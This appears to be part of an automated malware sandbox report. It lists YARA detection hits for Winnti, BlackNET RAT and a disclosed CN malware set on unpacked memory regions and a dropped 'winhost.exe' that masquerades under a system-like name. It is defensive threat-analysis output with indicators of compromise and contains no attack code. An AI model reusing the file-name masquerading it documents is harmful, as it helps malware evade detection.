                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dropped/winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_BlackNET date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE